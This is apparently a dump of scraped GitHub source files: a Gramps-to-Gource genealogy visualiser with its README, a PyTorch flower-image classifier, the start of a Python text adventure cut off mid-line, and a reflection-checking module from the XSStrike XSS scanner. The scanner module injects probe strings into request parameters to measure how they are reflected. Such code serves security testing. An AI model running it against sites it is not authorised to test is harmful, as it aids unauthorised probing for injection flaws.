default=None,\n type=str,\n help=\"The name of the file to send the output to\")\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO, format='%(levelname)s - %(message)s')\n\n if args.database is None:\n print(\"Error: No gramps file provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.names is None:\n print(\"Error: No focus name(s) provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.output is None:\n if len(args.names) > 1:\n args.output = \"pedigree.log\"\n else:\n lower_name = args.names[0].lower().replace(\" \", \"_\")\n args.output = \"pedigree_{0}.log\".format(lower_name)\n\n gramps.date_processor.register('my_cal_format', my_date_handler)\n g2g = Gramps2Gource(args.database)\n g2g.pedigree(args.names, args.output)\n\n logger.info(\"Done.\")\n" }, { "alpha_fraction": 0.7342668771743774, "alphanum_fraction": 0.7512356042861938, "avg_line_length": 41.74647903442383, "blob_id": "00fb862447a5b7f91d8766e03c3ae65ef6f478a9", "content_id": "f70a25b5586c3c0a1d5047f79cfdc76f01c7835e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6070, "license_type": "permissive", "max_line_length": 497, "num_lines": 142, "path": "/README.md", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "# Gramps2Gource\n\nBlurring the line between Genealogy and Software Configuration Management visualisation.\n\n[![Build Status](https://travis-ci.org/claws/gramps2gource.png?branch=master)](https://travis-ci.org/claws/gramps2gource)\n\n## Overview\n\n**Gramps2Gource** combines [Gramps](http://gramps-project.org/) (a Genealogy program written in Python) and [Gource](https://code.google.com/p/gource/) (a software version control visualisation tool for showing changes over time) to help produce a novel family history visualisation. It parses exported `.gramps` files to produce a Gource custom log file containing the pedigree for a specified person. This custom log file can then be passed to Gource for rendering. See the example video below:\n\n<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=sPtTTv6d0s8\n\" target=\"_blank\"><img src=\"http://i1.ytimg.com/vi/sPtTTv6d0s8/mqdefault.jpg\"\nalt=\"Gramps2Gource Example\" border=\"10\" /></a>\n\n\nThe Gource custom log format contains the following pipe ('|') delimited fields:\n\n timestamp - A unix timestamp of when the update occured.\n username - The name of the user who made the update.\n type - initial for the update type - (A)dded, (M)odified or (D)eleted.\n file - Path of the file updated.\n colour - A colour for the file in hex (FFFFFF) format. Optional.\n\nGramps2Gource works on Python2.7 and Python3.3.\n\nOne day I may investigate integrating this into Gramps as a plugin where it could access the Gramps database directly instead of via an exported `.gramps` file.\n\nAs always, garbage in garbage out. If your database is not well managed and consistent then your milage may vary.\n\nThis is really just a proof of concept. There is lots of cleanup that could be done and lots that could be added but it does what I wanted.\n\n## Setup\n\n### Install Gource\n\nGource can be installed using:\n\n $ sudo apt-get install gource\n\nNOTE: Gource versions prior to v0.38 could not handle negative times (times before 1970). This was a real show stopper for displaying family history which is all based in the past. However, since version 0.38 this issue was resolved. In recent versions of Ubuntu the Gource version is v0.40 so this should not be a problem.\n\n### Install Python Dependencies\n\n#### Install Future module\n\nGramps2Gource uses dateutil to help parse complex date descriptions.\n\n $ [sudo] pip[3] install python-dateutil\n\n#### Install Future module\n\nFor Python2 and Python3 compatibility Gramps2Gource uses the `future` module, hence this must be installed also.\n\n $ [sudo] pip[3] install future\n\n### Export a gramps file\n\n 1. Open your Gramps family history database\n 2. From the menu choose `Family Trees` then `Export...`\n 3. In the dialog that opens click `Forward`.\n 4. Select `Gramps XML (family tree)` then click forward.\n 5. Click forward again as the defaults are OK.\n 6. Choose a filename then click `Forward`.\n 7. Click Apply.\n\n### Download Gramps2Gource\n\n\tgit clone https://github.com/claws/gramps2gource.git\n\tcd gramps2gource\n\n\n## Using Gramps2Gource\n\nTo generate the custom gource log and display it you need to tell the `gramps2gource.py` script the focus person and the path to the Gramps database file. An output file containing the gource custom log will be saved to a file called `pedigree_<name>.log`.\n\nExample:\n\n $ python gramps2gource.py --name=\"Amber Marie Smith\" --db=example.gramps --output=pedigree_amber_marie_smith.log\n $ cat pedigree_amber_marie_smith.log | gource --load-config gource.conf -\n\nThe `gource.conf` effectively builds a command line similar to:\n\n $ cat pedigree_amber_marie_smith.log | gource -1280x720 --log-format custom --font-size 20 --hide users,dirnames,date --stop-at-end --camera-mode overview --seconds-per-day 1 --disable-bloom --auto-skip-seconds 1 -i 0 -c 3.0 -\n\nThe '-' at the end is important, it instructs Gource to read from standard input.\n\n\n### Calendar Formats\n\nEvent dates can often be stored in different calendar formats. To accomodate\nthis it is possible to implement your own date parser to convert your specific\ncalendar date strings into the necessary datetime object used by Gramps2Gource.\n\nInstead of running `gramps2gource.py` you will need to use something like the\n`custom_date_g2g.py` example. This script accepts the same command line\narguments as the `gramps2gource.py` script.\n\nPrior to running the script you will need to make some code changes to\nimplement and register your specific date handler functions.\n\nFor example, if you have event dates in `French Republican` format (e.g. the\n`cformat` field stored within the gramps date item is `French Republican`) you\nwould create and register a handler with the name `French Republican`. For\nexample:\n\n``` python\n\ndef frech_republican_date_handler(datestring):\n return magic_datetime_creater(datestring)\n\ngramps.date_processor.register(\n 'French Republican', french_republican_date_handler)\n```\n\nYou need to register the date parser prior to instantiating the\n`Gramps2Gource` object.\n\n\n### Multiple Focus People\n\nMultiple `name` arguments can be specified if you want to show more than one focus person. When multiple names are supplied the output file defaults to `pedigree.log`.\n\nExample:\n\n $ python gramps2gource.py --name=\"Amber Marie Smith\" --name=\"John Hjalmar Smith\" --db=example.gramps --output=pedigree.log\n $ cat pedigree.log | gource --load-config gource.conf --hide-root -\n\n\n\n### Record Visualisation\n\nTo record the visualisation to a video file, the following commands may be useful.\n\nh264:\n\n $ cat ~/path/to/custom_output.log | gource --load-config gource.conf -output-ppm-stream - --output-framerate 30 - | avconv -y -r 30 -f image2pipe -vcodec ppm -i - -b 8192K /path/to/video/output/file.mp4\n\nwebm:\n\n $ cat ~/path/to/custom_output.log | gource --load-config gource.conf -output-ppm-stream - | avconv -y -r 30 -f image2pipe -vcodec ppm -i - -vcodec libvpx -b 10000K /path/to/video/output/file.webm\n\n[![Analytics](https://ga-beacon.appspot.com/UA-29867375-2/gramps2gource/readme?pixel)](https://github.com/claws/gramps2gource)\n" } ]
4
dcurl/aipnd-project
https://github.com/dcurl/aipnd-project
02d526faf6308332c696334fdb6762aad6e87ae0
7d5376b81b8701a506034a2752793b70cc48066e
5ce7a760cee5abdcedc329048e0c4063874010d2
refs/heads/master
2020-04-22T01:22:04.099072
2019-02-27T00:56:12
2019-02-27T00:56:12
170,012,218
0
0
MIT
2019-02-10T18:38:43
2019-01-26T14:49:28
2018-11-30T15:50:56
null
[ { "alpha_fraction": 0.6491418480873108, "alphanum_fraction": 0.6667391061782837, "avg_line_length": 29.483444213867188, "blob_id": "6babe6dd4e73dcc973740c910591acd8414284b7", "content_id": "3c6440a92fece24fc4a60c48e8919197fa9a1ab2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4603, "license_type": "permissive", "max_line_length": 127, "num_lines": 151, "path": "/predict.py", "repo_name": "dcurl/aipnd-project", "src_encoding": "UTF-8", "text": "#Imports\nimport json\nimport sys\n\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nfrom PIL import Image\n\nimport argparse\n\n#Create argparse for easy user entry\nparser = parser = argparse.ArgumentParser()\nparser.add_argument('--img_path', type = str, default = 'flowers/test/52/image_04200.jpg', help = 'Directory of Dataset')\nparser.add_argument('--load_chkpt', type = str, default = 'checkpoint.pth', help='Load the trained model from a file')\nparser.add_argument('--gpu', type = bool, default = 'True', help='True for GPU, False for CPU')\nparser.add_argument('--category_names', type = str, default = 'cat_to_name.json', help='File containing classifier categories')\nparser.add_argument('--top_k', type = int, default = 5, help = 'Number of Top Categories to return')\nargs = parser.parse_args()\n\n# Set variables based on user entry\nif args.img_path is not None:\n img_path = args.img_path\n\nif args.gpu is not None:\n gpu = args.gpu\n\nif args.load_chkpt is not None:\n load_chkpt = args.load_chkpt\n\nif args.category_names is not None:\n category_names = args.category_names\n\nif args.top_k is not None:\n top_k = args.top_k\n\n\n# Load checkpoint Function\ndef load_checkpoint(filepath):\n checkpoint= torch.load(filepath)\n model = getattr(models, checkpoint['architecture'])(pretrained=True)\n model.class_to_idx = checkpoint['class_to_idx']\n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n return model\n\n# Process Image Function\ndef process_image(image):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n\n # TODO: Process a PIL image for use in a PyTorch model\n # Set Variables\n means = [0.485, 0.456, 0.406]\n std_devs = [0.229, 0.224, 0.225]\n\n # Processing Steps\n process_img = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(means, std_devs)])\n\n # Process image through Processing Steps\n pil_img = Image.open(image)\n pil_img = process_img(pil_img).float()\n np_img = np.array(pil_img)\n\n return np_img\n\n# Display Image Function\ndef imshow(image, ax=None, title=None):\n if ax is None:\n fig, ax = plt.subplots()\n\n # PyTorch tensors assume the color channel is the first dimension\n # but matplotlib assumes is the third dimension\n image = image.transpose((1, 2, 0))\n\n # Undo preprocessing\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n image = std * image + mean\n\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\n image = np.clip(image, 0, 1)\n\n ax.imshow(image)\n\n return ax\n\n# Prediction function\ndef predict(image_path, model, topk=5):\n # Process image\n sample_img = process_image(image_path)\n\n # Convert Numpy to Tensor\n img_tensor = torch.from_numpy(sample_img).type(torch.FloatTensor)\n\n # Add batch of size 1 to image\n sample_input = img_tensor.unsqueeze(0)\n\n # Get Probabilities\n ps = torch.exp(model.forward(sample_input))\n ps, labels = torch.topk(ps, topk)\n\n # Seperate Probabilities (ps), Numeric Labels (labels) into individual lists\n top_ps = ps.detach().numpy().tolist()[0]\n top_labels = labels.detach().numpy().tolist()[0]\n\n # Gather Flower Labels and convert Numeric Label to Flower Label\n with open('cat_to_name.json', 'r') as f:\n cat_to_name = json.load(f)\n\n idx_to_class = {val: key for key, val in\n model.class_to_idx.items()}\n top_flowers = [cat_to_name[idx_to_class[label]] for label in top_labels]\n\n\n # Return Probabilities (ps), Numeric Labels (Labels), Flower Labels\n return top_ps, top_labels, top_flowers\n\n\n# Test Loading Checkpoint\n#Load model from checkpoint saved in train.py\nmodel = load_checkpoint(load_chkpt)\n\n#Switch to CPU and Evaluation\nmodel.to('cpu')\nmodel.eval()\n\n# Set Test Image\nimage_path = img_path\n\n# Make prediction\nps, labels, flowers = predict(image_path, model, top_k)\n\n# Print Prediction\nprint(\"Image: \", img_path)\nprint(\"\\nTop \", top_k, \" Predictions\")\nprint(\"Percentage: \", ps)\nprint(\"Numeric Label: \", labels)\nprint(\"Flower Label: \", flowers)\nprint(\"\\nTop Prediction\")\nprint(\"Percentage: \", round(ps[0] * 100, 2), \"%\")\nprint(\"Numeric Label: \", labels[0])\nprint(\"Flower Label: \", flowers[0])\n" }, { "alpha_fraction": 0.6055343747138977, "alphanum_fraction": 0.6291984915733337, "avg_line_length": 39.7782096862793, "blob_id": "fd146ec61f7e99b549a434968c6d62d5cb38d501", "content_id": "895d62d67a596d1c2faa3f91da6c315f9ed6ef1f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10480, "license_type": "permissive", "max_line_length": 223, "num_lines": 257, "path": "/train.py", "repo_name": "dcurl/aipnd-project", "src_encoding": "UTF-8", "text": "# Imports\nimport json\nimport sys\n\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nimport argparse\n\n#Create argparse for easy user entry\nparser = parser = argparse.ArgumentParser()\nparser.add_argument('--data_dir', type = str, default = 'flowers', help = 'Directory of Dataset')\nparser.add_argument('--gpu', type = bool, default = 'True', help='True for GPU, False for CPU')\nparser.add_argument('--learn_rate', type = float, default = 0.001, help = 'Learning Rate (Ex: 0.001)')\nparser.add_argument('--epochs', type = int, default = 10, help = 'Number of Epochs for Training')\nparser.add_argument('--arch', type = str, default='densenet121', help='Architecture: Either densenet121 or vgg16')\nparser.add_argument('--hidden_units', type = int, default = 256, help='Units for Hidden Layer')\nparser.add_argument('--save_dir', type = str, default = 'checkpoint.pth', help='Save the trained model to a file')\nargs = parser.parse_args()\n\n# Set variables based on user entry\nif args.data_dir is not None:\n data_directory = args.data_dir\n\nif args.gpu is not None:\n gpu = args.gpu\n\nif args.learn_rate is not None:\n learn_rate = args.learn_rate\n\nif args.epochs is not None:\n epochs = args.epochs\n\nif args.arch is not None:\n arch = args.arch\n\nif args.hidden_units is not None:\n hidden_units = args.hidden_units\n\nif args.save_dir is not None:\n save_dir = args.save_dir\n\n# Function to set Directories for the Train, Validation, and Test Data\ndef load_data(data_directory = 'flowers'):\n data_dir = data_directory\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n return data_dir, train_dir, valid_dir, test_dir\n\n# Function to transform data for Train, Validation, and Test Sets\ndef transform_data(data_dir, train_dir, valid_dir, test_dir):\n data_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n valid_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n test_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # TODO: Load the datasets with ImageFolder\n image_datasets = datasets.ImageFolder(data_dir, transform = data_transforms)\n train_datasets = datasets.ImageFolder(train_dir, transform = train_transforms)\n valid_datasets = datasets.ImageFolder(valid_dir, transform = valid_transforms)\n test_datasets = datasets.ImageFolder(test_dir, transform = test_transforms)\n\n # TODO: Using the image datasets and the trainforms, define the dataloaders\n dataloaders = torch.utils.data.DataLoader(image_datasets)\n trainloader = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)\n validloader = torch.utils.data.DataLoader(valid_datasets, batch_size=32)\n testloader = torch.utils.data.DataLoader(test_datasets, batch_size=32)\n return train_datasets, valid_datasets, test_datasets, trainloader, validloader, testloader\n\n# Function to build custom network and train it (calls the build_and_train Function)\ndef set_model(arch='densenet121', learn_rate = 0.001, hidden_units = [256], epochs=10, gpu = True):\n\n # TODO: Build and train your network\n # Load a pre-trained network, depending on user input\n if arch == \"vgg16\":\n model = models.vgg16(pretrained=True)\n input_size = 25088\n model, model_classifier, model_optimizer, model_statedict, optimizer_statedict = build_and_train(model = model, learn_rate = learn_rate, input_size = input_size, hidden_size = hidden_units, epochs=epochs, gpu = gpu)\n\n elif arch == \"densenet121\":\n model = models.densenet121(pretrained=True)\n input_size = 1024\n model, model_classifier, model_optimizer, model_statedict, optimizer_statedict = build_and_train(model = model, learn_rate = learn_rate, input_size = input_size, hidden_size = hidden_units, epochs=epochs, gpu = gpu)\n else:\n print('Please select Architecture as \"vgg16\" or \"densenet121\"')\n sys.exit()\n\n return model, input_size, model_classifier, model_optimizer, model_statedict, optimizer_statedict\n\n# Buid and train model\ndef build_and_train(model = models.densenet121(pretrained=True), learn_rate = 0.001, input_size = 1024, hidden_size = 256, epochs=10, gpu = True):\n # Define a new, untrained feed-forward\n # network as a classifier, using ReLU activations and dropout\n\n # Freeze parameters so we don't backprop through them\n for param in model.parameters():\n param.requires_grad = False\n\n #input_size = 1024\n #hidden_size = hidden_units\n output_size = 102\n\n #Build Classifier\n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('drop', nn.Dropout(0.50)),\n ('fc1', nn.Linear(input_size, hidden_size)),\n ('relu1', nn.ReLU()),\n ('fc2', nn.Linear(hidden_size, output_size)),\n ('softmax', nn.LogSoftmax(dim = 1))\n ]))\n\n model.classifier = classifier\n\n\n # Train the classifier layers using backpropagation\n # using the pre-trained network to get the features\n if gpu == True:\n model.to('cuda')\n else:\n model.to('cpu')\n\n\n #Train a model with a pre-trained network\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), lr = learn_rate)\n\n\n # Variables\n epochs = epochs\n print_every = 10\n steps = 0\n running_loss = 0\n\n # Set device agnostic to automatically decide if cuda (gpu) or cpu\n #device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Track the loss and accuracy on the validation set to determine the best hyperparameters\n # Start Training Loop (will measure validation as we're training)\n for e in range(epochs):\n\n # Make sure training is on\n model.train()\n\n for ii, (inputs, labels) in enumerate(trainloader):\n\n steps += 1\n\n # Move Parameters, model to GPU or CPU, depending on what user requested\n if gpu == True:\n inputs, labels = inputs.to(\"cuda\"), labels.to(\"cuda\")\n else:\n inputs, labels = inputs.to(\"cpu\"), labels.to(\"cpu\")\n\n #Flatten image into 25088 (244 * 244) long vector\n #inputs.resize_(inputs.size()[0], 25088)\n\n optimizer.zero_grad()\n\n # Forward and backward passes\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n if steps % print_every == 0:\n\n # Make sure network is in eval mode for inference\n model.eval()\n\n # Turn off gradients for validation, saves memory and computations\n with torch.no_grad():\n valid_loss, accuracy = validation(model, validloader, criterion, gpu)\n\n print(\"Epoch: {}/{}... \".format(e+1, epochs),\n \"Training Loss: {:.3F}.. \".format(running_loss/print_every),\n \"Validation Loss: {:.3F}.. \".format(valid_loss/len(validloader)),\n \"Validation Accuracy: {:.3f}\".format(accuracy/len(validloader)))\n\n running_loss = 0\n\n # Make sure training is back on\n model.train()\n\n return model, model.classifier, optimizer, model.state_dict(), optimizer.state_dict()\n\n#Implement function for validation pass\ndef validation(model, validloader, criterion, gpu = True):\n valid_loss = 0\n accuracy = 0\n\n for inputs, labels in validloader:\n if gpu == True:\n inputs, labels = inputs.to(\"cuda\"), labels.to(\"cuda\")\n else:\n inputs, labels = inputs.to(\"cpu\"), labels.to(\"cpu\")\n\n output = model.forward(inputs)\n valid_loss = criterion(output, labels).item()\n\n ps = torch.exp(output)\n equality = (labels.data == ps.max(dim=1)[1])\n accuracy += equality.type(torch.cuda.FloatTensor).mean()\n\n return valid_loss, accuracy\n\ndef save_checkpoint(checkpoint, save_dir = 'checkpoint.pth'):\n torch.save(checkpoint, save_dir)\n\n# Load the Datasets\ndata_dir, train_dir, valid_dir, test_dir = load_data(data_directory)\n\n# Transform the Data\ntrain_datasets, valid_datasets, test_datasets, trainloader, validloader, testloader = transform_data(data_dir, train_dir, valid_dir, test_dir)\n\n#Set, Build, and Train the Model, Returns info for Checkpoint\nmodel, input_size, model_classifier, model_optimizer, model_statedict, optimizer_statedict = set_model(arch = arch, learn_rate = learn_rate, hidden_units = hidden_units, epochs = epochs, gpu = gpu)\n\n#Create & Save Checkpoint\nmodel.class_to_idx = train_datasets.class_to_idx\n\ncheckpoint = {'input_size': input_size,\n 'output_size': 102,\n 'hidden_size': hidden_units,\n 'epochs': epochs,\n 'classifier': model_classifier, #model.classifier\n 'architecture': arch,\n 'state_dict': model_statedict, #model.statedict\n 'optimizer': model_optimizer, #optimizer\n 'optimizer_state': optimizer_statedict, #optimizer.state_dict()\n 'class_to_idx': model.class_to_idx}\n\nsave_checkpoint(checkpoint, save_dir)\nprint(\"Checkpoint Saved Successfully\")\n" } ]
2
forkworkClone/XSStrike
https://github.com/forkworkClone/XSStrike
67c4637170ca527264a851099faa6bef4bb05df1
ce4bfad386d991c40bcd6d36a2a3837fa050d59f
1b66379ca1746dd240ff9694d1f90f0896f29f42
refs/heads/master
2020-04-05T16:55:55.253560
2018-11-10T18:06:15
2018-11-10T18:06:15
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6899641752243042, "alphanum_fraction": 0.6962365508079529, "avg_line_length": 38.89285659790039, "blob_id": "2ef47345b8444bed3f0ee782684fa49007084c4f", "content_id": "d070236254ff37d3c25ebae979740e8443b1eeeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 119, "num_lines": 28, "path": "/core/checker.py", "repo_name": "forkworkClone/XSStrike", "src_encoding": "UTF-8", "text": "import re\nimport copy\nfrom fuzzywuzzy import fuzz\nfrom core.config import xsschecker\nfrom urllib.parse import quote_plus\nfrom core.requester import requester\nfrom core.utils import replacer, fillHoles\n\ndef checker(url, params, headers, GET, delay, payload, positions, timeout):\n checkString = 'st4r7s' + payload\n paramsCopy = copy.deepcopy(params)\n response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay, timeout).text.lower()\n reflectedPositions = []\n for match in re.finditer('st4r7s', response):\n reflectedPositions.append(match.start())\n filledPositions = fillHoles(positions, reflectedPositions)\n # Itretating over the reflections\n efficiencies = []\n for position in reflectedPositions:\n if position:\n reflected = response[position:position+len(checkString)]\n efficiency = fuzz.partial_ratio(reflected, checkString.lower())\n if reflected[-1] == '\\\\':\n efficiency += 1\n efficiencies.append(efficiency)\n else:\n efficiencies.append(0)\n return efficiencies" } ]
1
MeheroonTondra/text-based-adventure-game
https://github.com/MeheroonTondra/text-based-adventure-game
d4ab0d8888752ded8bb307abfdd9e689ab21e8f8
fbf7482ba303cd2d1c6c494c6d784916cf6339c3
3df031125c56df1fa1497c2cb1070270ee72e713
refs/heads/master
2021-07-19T20:58:54.668368
2017-10-29T23:43:31
2017-10-29T23:43:31
108,780,726
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 28.33333396911621, "blob_id": "46c7b8ccd358603b08b44836dd87a572194d1cf8", "content_id": "868a2e6f3f57bf1a0a383ac30d410790deb1b988", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/README.md", "repo_name": "MeheroonTondra/text-based-adventure-game", "src_encoding": "UTF-8", "text": "# text-based-adventure-game\n# only show basic use of python\n# i think the story is good \n" }, { "alpha_fraction": 0.5701834559440613, "alphanum_fraction": 0.5753363966941833, "avg_line_length": 52.24760437011719, "blob_id": "17388e0dd48e680299aa45b603aff4e5c80003ea", "content_id": "111bf769de68b5f81ec3c4be097d005659888cbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33985, "license_type": "no_license", "max_line_length": 229, "num_lines": 626, "path": "/adventure.py", "repo_name": "MeheroonTondra/text-based-adventure-game", "src_encoding": "UTF-8", "text": "\r\n#a simple text-based adventure(boken) game. :)\r\nprint(\"*************************\")\r\nprint('* Welcome to Boken! *')\r\nprint(\"*************************\")\r\nname = input(\"Enter a user name:\")\r\nsex = input(\"sex?-M/F-\")\r\nprint(\"------------------\")\r\nprint(\"- Start game! -\")\r\nprint(\"------------------\")\r\nprint(\"User: \" + name + \"(\" + sex + \")\")\r\nspace = input(\"Click enter to continue: \")\r\nprint(name + \" is an ordinary high school student.\")\r\nprint(\"On an usual rainy evening, you arrive home from school.\\nThe sky was getting grey and the rain kept being incessantly heavy.\")\r\nprint(\"However, not eveything was the same as before; you \\nsee an unusual pattern drawn on your wall: like a magic circle!\")\r\nprint(\"A sudden lightening! A weird bright light seems to sip through \\nthe crack on the wall circle which made you blind.\\n\")\r\ninput(\"Press enter to continue.\")\r\nprint(\"--------------------\")\r\nprint(\"////////////////////\")\r\nprint(\"/ / / / / / / / / /\")\r\nprint(\"/ / / / / / /\")\r\nprint(\"/ / / / / \")\r\ninput(\"Press enter to continue.\")\r\nprint(\"\\n--Everthing's hazy: it's turning pitch black as you are slowly losing your senses.--\")\r\nprint(\"===================\")\r\nprint(\" unconcious \")\r\nprint(\"===================\")\r\nprint(\"\\n--You wake up from an almost deep slumber to find yourself in an unknown world.--\")\r\n#apple, jewel, potion numbers\r\namount = [0, 0, 0]\r\napple = 0\r\njewel = 0\r\npotion = 0\r\n\r\n#bag function prints the number of\r\n#apple, food and jewel you have\r\ndef bag():\r\n print(\"apple, jewel, potion: \")\r\n print(amount)\r\n return\r\n\r\n#to update apple in the array amount\r\ndef changeapple(n):\r\n amount[0] = apple + n\r\n bag()\r\n return\r\n\r\n#to update jewel in the array amount\r\ndef changejewel(n):\r\n amount[1] = jewel + n\r\n bag()\r\n return\r\n\r\n#to update potions in the array amount\r\ndef changepotion(n):\r\n amount[2] = potion + n\r\n bag()\r\n return\r\n\r\nprint(\"--After you are fully awake, you find yourself lost and alone with just an empty bag, which was never yours to begin with.--\")\r\nbag()\r\n\r\nprint(\"\\n===================\")\r\nprint(\" Level 1 \")\r\nprint(\"===================\")\r\nprint(\"\\n+++++++++++++++++++++++\")\r\nprint(\"+ + + + + + + + + + + +\")\r\nprint(\"| /|/ \\| | | | / | | /\")\r\nprint(\"|/ |/ \\| |/ \\|/ |/ \\|/\")\r\nprint(\"| || | || | || ||\")\r\nprint(\"----------------------\")\r\nprint(\"--While you did not know what to do inside this forest, a villager caught you in sight as he was passing by.--\")\r\nprint(\"Villager: A human!.....How on earth have you come here?!\")\r\nans = input(\"You: \")\r\nprint(\"--You are shocked by the villager's appearance: pointy ears and a tail--\")\r\nprint(\"Villager: It is dangerous for a human to stay here. Would you like to come with me to my home.\")\r\nprint(\"\\nChoose: 1(Would you like to go with the villager?) or 2(Would you like to continue on your own?)\")\r\nval = input(\"enter number: \")\r\n\r\n#When option 1 is chosen\r\nif val == '1':\r\n print(\"--You follow the villager to his home. You ask about this place and how you can go back to your home.--\")\r\n print(\"Villager: This is the demon world and you probably have been transported by a summoning circle.\")\r\n input(\"Press enter to continue!\")\r\n print(\"+ + + + + + + + + + + + + + + + + + + + + + + + \")\r\n print(\"_______________-----------------------=======----------)\")\r\n print(\"| $$ **** $$ |____| |____\")\r\n print(\"(east || |||| |+| |+| |__}\")\r\n print(\"{village ============||===========||=========== $$$ Capital |________)\")\r\n print(\"( || -+-+-+-+- *****\\/++++ __}_\")\r\n print(\"( ++++ $$ || -=-=-=- ____|||||_|_||||__________}\")\r\n print(\"( |||| || ***++ )___|\")\r\n print(\"----------------_______||||___$$______|\")\r\n print(\"+ + + + + + + + + + + + + + + + + + + + + + + + \\n\")\r\n\r\n print(\"Villager: Now you are in a small rural and in the furthest east village. Only farmers live here.\")\r\n print(\"Anyone from another world can only return using the magic circle in the capital centre.\")\r\n print(\"You: So, how can i get there, the capital center?\")\r\n print(\"Villager: You have follow the main route to the west, but you can't walk there as it's too far.Therefore, you need food and jewel to travel from our village to the capital.\")\r\n input(\"Press enter to continue!\")\r\n print(\"--------------------\")\r\n print(\" \\_/ \")\r\n print(\" _||__\")\r\n print(\" (_*_*_)\")\r\n print(\"--------------------\")\r\n print(\"Also, take this potion, drink it when you decide to travel so you can hide yor presence from evil demons.\")\r\n print(\"You: Thank you. I will take the potion\\n\")\r\n changepotion(1)\r\n print(\"\\nYou: What are jewel used for? Can you tell me where i can get food supply?\")\r\n print(\"Villager: We exchange jewel as our currency. You will need to find a job to earn some jewel.\")\r\n print(\"We have apples that you can eat and also you can find apple trees everywhere.\")\r\n print(\"You: How can i find a work in this world?\")\r\n print(\"Villager: You see there is a giant water serpent in the river. It is the only source of our water supply.\")\r\n print(\"Many were killed while trying to get water from that river. Our preserved water is also limited.O human!\\n Will you be kind enough to slaughter the serpent for us? We villagers will offer you 30 jewels.\")\r\n print(\"You: Thank you, kind villager! I will take on your offer.\\n\")\r\n print(\"--You followed the villager to the river where the water serpent is.--\")\r\n print(\"--On your way you find 10 apples on the ground.--\")\r\n input(\"To collect the 10 apples press enter: \")\r\n\r\n changeapple(10)\r\n\r\n print(\"\\n///////////////////////\")\r\n print(\"//___// \")\r\n print(\" / + \\ \")\r\n print(\" \\= \\_ \")\r\n print(\" | * \\_ |\")\r\n print(\" \\ * \\ / |\")\r\n print(\" \\ * \\ / /\")\r\n print(\"/////////////////////////\\n\")\r\n print(\"+++++++++++++++++\")\r\n print(\" Battle \")\r\n print(\"+++++++++++++++++\")\r\n print(\"--You take the sword given by the villagers and approach it slowly.--\")\r\n print(\"--As the slightest sound reached the serpent, it moves towards you to attack with its scales.--\")\r\n print(\"--You use your sword to deflect it's attack and it forces you back.--\")\r\n print(\"--You run forward to pierce it and the serpent creeps with its mouth open to swallow you whole.--\")\r\n print(\"________________\")\r\n print(\" SLASH \")\r\n print(\"________________\")\r\n print(\"--Your sword cut the inside of the serpents mouth, while you are gobbled.--\")\r\n print(\"--You are stuck inside the serpents belly with almost no energy to spare.--\")\r\n print(\"To regain all your stamina, you can eat 3 apples.\")\r\n input(\"To eat 3 apple write (3 apples): \\n\" )\r\n\r\n changeapple(7)\r\n\r\n print(\"\\n++++++++++++++++++++\")\r\n print(\" Full recovery \")\r\n print(\"+++++++++++++++++++++\")\r\n print(\"--Now, you use all force to cut open the serpent to escape.--\")\r\n print(\"--You hear screams as all the blood splatters with the serpent cut in half.--\")\r\n print(\"*After slaughtering serpent*\")\r\n print(\"(Villagers screaming with excitement)\")\r\n print(\"Villager 1: You are our hero! You saved us from the giant water serpent!\")\r\n print(\"Village chief: You have done so much for us kind stranger. Please accept a small reward from us:here is your 30 jewels.\")\r\n input(\"Type 'accept' to accept the 